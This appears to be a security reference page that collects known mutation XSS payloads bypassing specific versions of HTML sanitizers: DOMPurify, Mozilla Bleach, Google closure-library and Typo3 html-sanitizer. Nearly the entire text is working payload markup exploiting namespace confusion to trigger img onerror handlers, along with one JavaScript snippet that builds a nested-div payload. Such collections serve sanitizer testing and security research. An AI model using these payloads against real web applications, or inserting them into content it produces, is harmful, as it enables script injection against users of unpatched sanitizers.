Known payloads
Mutation XSS
Most of the payloads exploit namespace confusion techniques.
DOMPurify
2.0.0
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
2.0.17
<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>
2.0.17
<math><mtext><table><mglyph><style><!--</style><img title="--></mglyph><img	src=1	onerror=alert(1)>">
2.0.17
<math><mtext><table><mglyph><style><math><table id=”</table>”><img src onerror=alert(1)”>
2.2.0
<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">
2.2.3
<svg><xss><desc><noscript></noscript></desc><p></p><style><a title="</style><img src onerror=alert(1)>">
3.0.8
<svg><annotation-xml><foreignobject><style><!--</style><p id="--><img src='x' onerror='alert(1)'>">
3.1.0
n = 506; var payload = `${"<div>".repeat(n)}<table id="outer"><caption id="outer"><svg><desc><table id="inner"><caption id="inner"></caption></table></desc><style><a title="</style><img src onerror=alert(1)>"></a></style></svg></caption></table>${"</div>".repeat(n)}`;
3.1.7
<svg><a><foreignobject><a><table><a></table><style><!--</style></svg><a id="-><img src onerror=alert(1)>">.
3.2.1
<math><foo-test><mi><li><table><foo-test><li></li></foo-test>a<a><style><!--</style>a<foo-bar is="--><img src=x onerror=alert(1)>">
3.2.2
<math><foo-test><mi><li><table><foo-test><li></li></foo-test><a><style><! \${</style>}<foo-b id="><img src onerror='alert(1)'>">hmm...</foo-b></a></table></li></mi></foo-test></math>
Mozilla Bleach
3.1.0
<noscript><style></noscript><img src=x onerror=alert(1)>
3.1.1
<svg><style><img src=x onerror=alert(1)>
3.2.3
<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>
Google closure-library
v20190215
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
Typo3 html-sanitizer
2.0.15
<!--a foo=--!><img src=x onerror=alert(1)><!--<a>">
2.0.16
<![CDATA[<math><img src=x onerror=alert(1)>]]>
Last updated